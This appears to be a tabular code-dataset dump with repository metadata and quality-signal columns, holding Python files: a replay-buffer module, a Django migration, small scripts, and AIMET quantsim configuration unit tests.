hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
48ed0bf1cef48d3b167627f0947b85e155fcb919
| 191
|
py
|
Python
|
_src/Section 1/Scripts_1_3/Immutable.py
|
paullewallencom/functional-programming-978-1-7889-9029-5
|
2f68defe03335bd8339810105e03c842b022e690
|
[
"Apache-2.0"
] | 12
|
2019-01-03T14:53:16.000Z
|
2021-10-04T04:52:51.000Z
|
_src/Section 1/Scripts_1_3/Immutable.py
|
paullewallencom/functional-programming-978-1-7889-9029-5
|
2f68defe03335bd8339810105e03c842b022e690
|
[
"Apache-2.0"
] | 1
|
2019-02-08T10:14:26.000Z
|
2019-02-08T10:14:26.000Z
|
_src/Section 1/Scripts_1_3/Immutable.py
|
paullewallencom/functional-programming-978-1-7889-9029-5
|
2f68defe03335bd8339810105e03c842b022e690
|
[
"Apache-2.0"
] | 5
|
2019-02-06T09:27:34.000Z
|
2020-06-15T13:18:38.000Z
|
x = 123
print "Unique Id of x is", id(x)
y = 123
print "Unique Id of y is", id(y)
print "\n\n After Update\n"
y = y + 1
print "Unique Id of x is", id(x)
print "Unique Id of y is", id(y)
| 13.642857
| 32
| 0.596859
| 45
| 191
| 2.533333
| 0.266667
| 0.385965
| 0.45614
| 0.526316
| 0.789474
| 0.736842
| 0.736842
| 0.736842
| 0
| 0
| 0
| 0.048951
| 0.251309
| 191
| 14
| 33
| 13.642857
| 0.748252
| 0
| 0
| 0.5
| 0
| 0
| 0.453125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.625
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
48ee25bdfb54edb5a2e1a5129a735e9550cdb0f4
| 44
|
py
|
Python
|
experiments_dikower/controllers/drlbox/evaluator/__init__.py
|
prokhn/onti-2019-bigdata
|
b9296141958f544177388be94072efce7bdc7814
|
[
"MIT"
] | null | null | null |
experiments_dikower/controllers/drlbox/evaluator/__init__.py
|
prokhn/onti-2019-bigdata
|
b9296141958f544177388be94072efce7bdc7814
|
[
"MIT"
] | null | null | null |
experiments_dikower/controllers/drlbox/evaluator/__init__.py
|
prokhn/onti-2019-bigdata
|
b9296141958f544177388be94072efce7bdc7814
|
[
"MIT"
] | null | null | null |
from .make_evaluator import make_evaluator
| 14.666667
| 42
| 0.863636
| 6
| 44
| 6
| 0.666667
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113636
| 44
| 2
| 43
| 22
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
48fb2d0e67d0491afc9b83be38ccbccf8942d951
| 7,860
|
py
|
Python
|
component/replay.py
|
G-Flor/deeprl
|
aeae2c5d585e5853dc638968b1f090eb60abd351
|
[
"Apache-2.0"
] | 4
|
2019-04-09T13:17:29.000Z
|
2020-04-25T03:45:11.000Z
|
component/replay.py
|
G-Flor/deeprl
|
aeae2c5d585e5853dc638968b1f090eb60abd351
|
[
"Apache-2.0"
] | null | null | null |
component/replay.py
|
G-Flor/deeprl
|
aeae2c5d585e5853dc638968b1f090eb60abd351
|
[
"Apache-2.0"
] | 3
|
2018-02-07T18:22:18.000Z
|
2019-06-25T08:01:17.000Z
|
#######################################################################
# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
import numpy as np
import torch
import random
import torch.multiprocessing as mp
class Replay:
def __init__(self, memory_size, batch_size, dtype=np.float32):
self.memory_size = memory_size
self.batch_size = batch_size
self.dtype = dtype
self.states = None
self.actions = np.empty(self.memory_size, dtype=np.int8)
self.rewards = np.empty(self.memory_size)
self.next_states = None
self.terminals = np.empty(self.memory_size, dtype=np.int8)
self.pos = 0
self.full = False
def feed(self, experience):
state, action, reward, next_state, done = experience
if self.states is None:
self.states = np.empty((self.memory_size, ) + state.shape, dtype=self.dtype)
self.next_states = np.empty((self.memory_size, ) + state.shape, dtype=self.dtype)
self.states[self.pos][:] = state
self.actions[self.pos] = action
self.rewards[self.pos] = reward
self.next_states[self.pos][:] = next_state
self.terminals[self.pos] = done
self.pos += 1
if self.pos == self.memory_size:
self.full = True
self.pos = 0
def sample(self):
upper_bound = self.memory_size if self.full else self.pos
sampled_indices = np.random.randint(0, upper_bound, size=self.batch_size)
return [self.states[sampled_indices],
self.actions[sampled_indices],
self.rewards[sampled_indices],
self.next_states[sampled_indices],
self.terminals[sampled_indices]]
class HybridRewardReplay:
def __init__(self, memory_size, batch_size, dtype=np.float32):
self.memory_size = memory_size
self.batch_size = batch_size
self.dtype = dtype
self.states = None
self.actions = np.empty(self.memory_size, dtype=np.int8)
self.rewards = None
self.next_states = None
self.terminals = np.empty(self.memory_size, dtype=np.int8)
self.pos = 0
self.full = False
def feed(self, experience):
state, action, reward, next_state, done = experience
if self.states is None:
self.rewards = np.empty((self.memory_size, ) + reward.shape, dtype=self.dtype)
self.states = np.empty((self.memory_size, ) + state.shape, dtype=self.dtype)
self.next_states = np.empty((self.memory_size, ) + state.shape, dtype=self.dtype)
self.states[self.pos][:] = state
self.actions[self.pos] = action
self.rewards[self.pos][:] = reward
self.next_states[self.pos][:] = next_state
self.terminals[self.pos] = done
self.pos += 1
if self.pos == self.memory_size:
self.full = True
self.pos = 0
def sample(self):
upper_bound = self.memory_size if self.full else self.pos
sampled_indices = np.random.randint(0, upper_bound, size=self.batch_size)
return [self.states[sampled_indices],
self.actions[sampled_indices],
self.rewards[sampled_indices],
self.next_states[sampled_indices],
self.terminals[sampled_indices]]
class SharedReplay:
def __init__(self, memory_size, batch_size, state_shape, action_shape):
self.memory_size = memory_size
self.batch_size = batch_size
self.states = torch.zeros((self.memory_size, ) + state_shape)
self.actions = torch.zeros((self.memory_size, ) + action_shape)
self.rewards = torch.zeros(self.memory_size)
self.next_states = torch.zeros((self.memory_size, ) + state_shape)
self.terminals = torch.zeros(self.memory_size)
self.states.share_memory_()
self.actions.share_memory_()
self.rewards.share_memory_()
self.next_states.share_memory_()
self.terminals.share_memory_()
self.pos = 0
self.full = False
self.buffer_lock = mp.Lock()
def feed_(self, experience):
state, action, reward, next_state, done = experience
self.states[self.pos][:] = torch.FloatTensor(state)
self.actions[self.pos][:] = torch.FloatTensor(action)
self.rewards[self.pos] = reward
self.next_states[self.pos][:] = torch.FloatTensor(next_state)
self.terminals[self.pos] = done
self.pos += 1
if self.pos == self.memory_size:
self.full = True
self.pos = 0
def size(self):
if self.full:
return self.memory_size
return self.pos
def sample_(self):
upper_bound = self.memory_size if self.full else self.pos
sampled_indices = torch.LongTensor(np.random.randint(0, upper_bound, size=self.batch_size))
return [self.states[sampled_indices],
self.actions[sampled_indices],
self.rewards[sampled_indices],
self.next_states[sampled_indices],
self.terminals[sampled_indices]]
def feed(self, experience):
with self.buffer_lock:
self.feed_(experience)
def sample(self):
with self.buffer_lock:
return self.sample_()
class HighDimActionReplay:
def __init__(self, memory_size, batch_size, dtype=np.float32):
self.memory_size = memory_size
self.batch_size = batch_size
self.dtype = dtype
self.states = None
self.actions = None
self.rewards = np.empty(self.memory_size)
self.next_states = None
self.terminals = np.empty(self.memory_size, dtype=np.int8)
self.pos = 0
self.full = False
def feed(self, experience):
state, action, reward, next_state, done = experience
if self.states is None:
self.states = np.empty((self.memory_size, ) + state.shape, dtype=self.dtype)
self.actions = np.empty((self.memory_size, ) + action.shape)
self.next_states = np.empty((self.memory_size, ) + state.shape, dtype=self.dtype)
self.states[self.pos][:] = state
self.actions[self.pos][:] = action
self.rewards[self.pos] = reward
self.next_states[self.pos][:] = next_state
self.terminals[self.pos] = done
self.pos += 1
if self.pos == self.memory_size:
self.full = True
self.pos = 0
def size(self):
if self.full:
return self.memory_size
return self.pos
def sample(self):
upper_bound = self.memory_size if self.full else self.pos
sampled_indices = np.random.randint(0, upper_bound, size=self.batch_size)
return [self.states[sampled_indices],
self.actions[sampled_indices],
self.rewards[sampled_indices],
self.next_states[sampled_indices],
self.terminals[sampled_indices]]
class GeneralReplay:
def __init__(self, memory_size, batch_size):
self.buffer = []
self.memory_size = memory_size
self.batch_size = batch_size
def feed(self, experiences):
for experience in zip(*experiences):
self.buffer.append(experience)
if len(self.buffer) > self.memory_size:
del self.buffer[0]
def sample(self):
sampled = zip(*random.sample(self.buffer, self.batch_size))
return sampled
def clear(self):
self.buffer = []
def full(self):
return len(self.buffer) == self.memory_size
| 34.933333
| 99
| 0.604707
| 963
| 7,860
| 4.764278
| 0.093458
| 0.102441
| 0.12816
| 0.05558
| 0.827158
| 0.807977
| 0.765693
| 0.746513
| 0.739538
| 0.720357
| 0
| 0.005605
| 0.273664
| 7,860
| 224
| 100
| 35.089286
| 0.798038
| 0.020356
| 0
| 0.737143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.022857
| 0.005714
| 0.234286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b23f6c801ce1ede222da9e90c7955bf2a9c3b6a
| 42
|
py
|
Python
|
build/lib/Football_Pitch/__init__.py
|
Ailihamu/Package_exp
|
e5bda7b06f11b5bdffb070f2a48a42f7dc33309f
|
[
"MIT"
] | 1
|
2020-06-17T01:21:32.000Z
|
2020-06-17T01:21:32.000Z
|
build/lib/Football_Pitch/__init__.py
|
Ailihamu/Package_exp
|
e5bda7b06f11b5bdffb070f2a48a42f7dc33309f
|
[
"MIT"
] | null | null | null |
build/lib/Football_Pitch/__init__.py
|
Ailihamu/Package_exp
|
e5bda7b06f11b5bdffb070f2a48a42f7dc33309f
|
[
"MIT"
] | null | null | null |
from .Football_Pitch import Football_Pitch
| 42
| 42
| 0.904762
| 6
| 42
| 6
| 0.666667
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 42
| 1
| 42
| 42
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d2b75c5d109e5fb348c6d5bd3a3c1b9a3c6e1699
| 4,556
|
py
|
Python
|
home/migrations/0019_auto_20200515_1717.py
|
IATI/new-website
|
b90783e32d19ac4c821c5ea018a52997a11b5286
|
[
"MIT"
] | 4
|
2019-03-28T06:42:17.000Z
|
2021-06-06T13:10:51.000Z
|
home/migrations/0019_auto_20200515_1717.py
|
IATI/new-website
|
b90783e32d19ac4c821c5ea018a52997a11b5286
|
[
"MIT"
] | 177
|
2018-09-28T14:21:56.000Z
|
2022-03-30T21:45:26.000Z
|
home/migrations/0019_auto_20200515_1717.py
|
IATI/new-website
|
b90783e32d19ac4c821c5ea018a52997a11b5286
|
[
"MIT"
] | 8
|
2018-10-25T20:43:10.000Z
|
2022-03-17T14:19:27.000Z
|
# Generated by Django 2.2.12 on 2020-05-15 17:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0018_remove_homepage_use_legacy_template'),
]
operations = [
migrations.AlterField(
model_name='homepage',
name='iati_in_action_description',
field=models.TextField(blank=True, help_text='Optional: description for the IATI in action section', max_length=500),
),
migrations.AlterField(
model_name='homepage',
name='iati_in_action_description_en',
field=models.TextField(blank=True, help_text='Optional: description for the IATI in action section', max_length=500, null=True),
),
migrations.AlterField(
model_name='homepage',
name='iati_in_action_description_es',
field=models.TextField(blank=True, help_text='Optional: description for the IATI in action section', max_length=500, null=True),
),
migrations.AlterField(
model_name='homepage',
name='iati_in_action_description_fr',
field=models.TextField(blank=True, help_text='Optional: description for the IATI in action section', max_length=500, null=True),
),
migrations.AlterField(
model_name='homepage',
name='iati_in_action_description_pt',
field=models.TextField(blank=True, help_text='Optional: description for the IATI in action section', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionfeatureditems',
name='description',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500),
),
migrations.AlterField(
model_name='iatiinactionfeatureditems',
name='description_en',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionfeatureditems',
name='description_es',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionfeatureditems',
name='description_fr',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionfeatureditems',
name='description_pt',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionitems',
name='description',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500),
),
migrations.AlterField(
model_name='iatiinactionitems',
name='description_en',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionitems',
name='description_es',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionitems',
name='description_fr',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
migrations.AlterField(
model_name='iatiinactionitems',
name='description_pt',
field=models.CharField(blank=True, help_text='Optional: description for the item. Defaults to the selected page excerpt if left blank', max_length=500, null=True),
),
]
| 51.191011
| 175
| 0.65957
| 517
| 4,556
| 5.663443
| 0.119923
| 0.102459
| 0.128074
| 0.148566
| 0.941598
| 0.941598
| 0.941598
| 0.927254
| 0.927254
| 0.927254
| 0
| 0.018895
| 0.244952
| 4,556
| 88
| 176
| 51.772727
| 0.832267
| 0.010097
| 0
| 0.841463
| 1
| 0
| 0.377107
| 0.068101
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012195
| 0
| 0.04878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9614a47566fb6f92c846189613d82687c0335403
| 77,008
|
py
|
Python
|
TrainingExtensions/torch/test/python/test_quantsim_config.py
|
aaronkjones/aimet
|
08feb34573281f87c53301935652a02f8d573858
|
[
"BSD-3-Clause"
] | null | null | null |
TrainingExtensions/torch/test/python/test_quantsim_config.py
|
aaronkjones/aimet
|
08feb34573281f87c53301935652a02f8d573858
|
[
"BSD-3-Clause"
] | null | null | null |
TrainingExtensions/torch/test/python/test_quantsim_config.py
|
aaronkjones/aimet
|
08feb34573281f87c53301935652a02f8d573858
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2020, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
""" Module for testing quantsim config feature """
import pytest
import json
import os
import torch
import libpymo
from aimet_common.defs import QuantScheme, QuantizationDataType, QuantDtypeBwInfo
from aimet_torch.examples.test_models import SingleResidual, QuantSimTinyModel, MultiInput, SingleResidualWithModuleAdd
from aimet_torch.quantsim import QuantizationSimModel
from aimet_torch.quantsim_config import quantsim_config as qsim_config
from aimet_torch.quantsim_config.quantsim_config import get_all_ops_in_neighborhood
from aimet_torch.qc_quantize_op import QcQuantizeWrapper
from aimet_torch import utils
from aimet_torch.meta.connectedgraph import ConnectedGraph
class ModelWithBertCustomLayerNormGelu(torch.nn.Module):
""" Model with PyTorch LayerNorm and gelu """
def __init__(self):
super(ModelWithBertCustomLayerNormGelu, self).__init__()
self.linear1 = torch.nn.Linear(4, 4)
# default attribute -
# eps = 1e-05 and elementwise_affine = True
# parameters : weight and bias
self.customln1 = torch.nn.LayerNorm(4)
self.gelu1 = torch.nn.GELU()
def forward(self, x):
x = self.linear1(x)
x = self.customln1(x)
x = self.gelu1(x)
return x
# pylint: disable=protected-access
class TestQuantsimConfig:
""" Class containing unit tests for quantsim config feature """
def test_parse_config_file_defaults(self):
""" Test that default quantization parameters are set correctly when using json config file """
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
},
"per_channel_quantization": "True",
},
"params": {},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32), in_place=True)
for name, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
# Output of add op is input quantized
if name == 'relu3':
assert module.input_quantizer.enabled
else:
assert not module.input_quantizer.enabled
assert module.output_quantizers[0].enabled
assert not module.input_quantizer.use_symmetric_encodings
assert not module.output_quantizers[0].use_symmetric_encodings
if module.param_quantizers:
for _, param_quantizer in module.param_quantizers.items():
assert not param_quantizer.enabled
assert param_quantizer.use_symmetric_encodings
assert len(param_quantizer._cppOp) > 1
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_params(self):
""" Test that param specific quantization parameters are set correctly when using json config file """
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
}
},
"params": {
"weight": {
"is_quantized": "True",
"is_symmetric": "False"
}
},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
for _, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
if module.param_quantizers:
for param_name, param_quantizer in module.param_quantizers.items():
if param_name == 'weight':
assert param_quantizer.enabled
assert not param_quantizer.use_symmetric_encodings
else:
assert not param_quantizer.enabled
assert param_quantizer.use_symmetric_encodings
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_default_supported_kernels(self):
"""
Test that the supported_kernels in the defaults section is parsed correctly and its values are added
in the dict _supported_kernels
"""
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
},
"supported_kernels":[
{
"activation": {
"bitwidth": 16,
"dtype": "int"
},
"param": {
"bitwidth": 8,
"dtype": "int"
}
},
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
}
]
},
"params": {
"weight": {
"is_quantized": "True",
"is_symmetric": "False"
}
},
"op_type": {},
"supergroups": [],
"model_input": {},
"model_output": {}
}
expected_supported_kernels = [
{
"activation": {
"bitwidth": 16,
"dtype": QuantizationDataType.int
},
"param": {
"bitwidth": 8,
"dtype": QuantizationDataType.int
}
},
{
"activation": {
"bitwidth": 16,
"dtype": QuantizationDataType.float
},
"param": {
"bitwidth": 16,
"dtype": QuantizationDataType.float
}
}
]
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
supported_kernels_in_defaults = sim._supported_kernels["defaults"]
assert len(supported_kernels_in_defaults) == 2
assert supported_kernels_in_defaults == expected_supported_kernels
def test_parse_config_file_op_type(self):
""" Test that op specific quantization parameters are set correctly when using json config file """
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
"is_symmetric": "True"
}
},
"params": {},
"op_type": {
"Conv": {
"is_input_quantized": "True",
"is_symmetric": "False",
"params": {
"bias": {
"is_quantized": "True",
"is_symmetric": "False"
}
}
}
},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32))
for name, module in sim.model.named_modules():
if isinstance(module, QcQuantizeWrapper):
if isinstance(module._module_to_wrap, torch.nn.Conv2d):
assert module.input_quantizer.enabled
assert not module.input_quantizer.use_symmetric_encodings
assert not module.output_quantizers[0].use_symmetric_encodings
else:
# Output of add op is input quantized
if name == 'relu3':
assert module.input_quantizer.enabled
else:
assert not module.input_quantizer.enabled
assert module.output_quantizers[0].enabled
assert not module.input_quantizer.use_symmetric_encodings
assert not module.output_quantizers[0].use_symmetric_encodings
if module.param_quantizers:
for param_name, param_quantizer in module.param_quantizers.items():
if isinstance(module._module_to_wrap, torch.nn.Conv2d) and param_name == 'bias':
assert param_quantizer.enabled
assert not param_quantizer.use_symmetric_encodings
else:
assert not param_quantizer.enabled
assert param_quantizer.use_symmetric_encodings
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_parse_config_file_op_type_supported_kernels(self):
"""
Test that the supported_kernels in the op_type section is parsed correctly and its values are added
in the dict _supported_kernels
"""
model = SingleResidual()
model.eval()
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True",
"is_symmetric": "False"
},
"params": {
"is_quantized": "False",
